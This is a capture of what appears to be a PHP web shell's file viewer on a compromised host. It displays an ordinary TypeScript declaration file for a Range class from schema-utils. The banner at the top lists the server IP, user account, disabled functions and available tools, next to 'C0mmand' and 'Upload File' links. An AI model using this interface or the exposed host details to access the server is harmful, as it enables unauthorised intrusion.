Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/schema-utils/declarations/util/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
export = Range; /** * @typedef {[number, boolean]} RangeValue */ /** * @callback RangeValueCallback * @param {RangeValue} rangeValue * @returns {boolean} */ declare class Range { /** * @param {"left" | "right"} side * @param {boolean} exclusive * @returns {">" | ">=" | "<" | "<="} */ static getOperator( side: "left" | "right", exclusive: boolean ): ">" | ">=" | "<" | "<="; /** * @param {number} value * @param {boolean} logic is not logic applied * @param {boolean} exclusive is range exclusive * @returns {string} */ static formatRight(value: number, logic: boolean, exclusive: boolean): string; /** * @param {number} value * @param {boolean} logic is not logic applied * @param {boolean} exclusive is range exclusive * @returns {string} */ static formatLeft(value: number, logic: boolean, exclusive: boolean): string; /** * @param {number} start left side value * @param {number} end right side value * @param {boolean} startExclusive is range exclusive from left side * @param {boolean} endExclusive is range exclusive from right side * @param {boolean} logic is not logic applied * @returns {string} */ static formatRange( start: number, end: number, startExclusive: boolean, endExclusive: boolean, logic: boolean ): string; /** * @param {Array<RangeValue>} values * @param {boolean} logic is not logic applied * @return {RangeValue} computed value and it's exclusive flag */ static getRangeValue(values: Array<RangeValue>, logic: boolean): RangeValue; /** @type {Array<RangeValue>} */ _left: Array<RangeValue>; /** @type {Array<RangeValue>} */ _right: Array<RangeValue>; /** * @param {number} value * @param {boolean=} exclusive */ left(value: number, exclusive?: boolean | undefined): void; /** * @param {number} value * @param {boolean=} exclusive */ right(value: number, exclusive?: boolean | undefined): void; /** * @param {boolean} logic is not logic applied * @return {string} "smart" range string representation */ format(logic?: boolean): string; } declare namespace Range { export { RangeValue, RangeValueCallback }; } type RangeValue = [number, boolean]; type RangeValueCallback = (rangeValue: RangeValue) => boolean;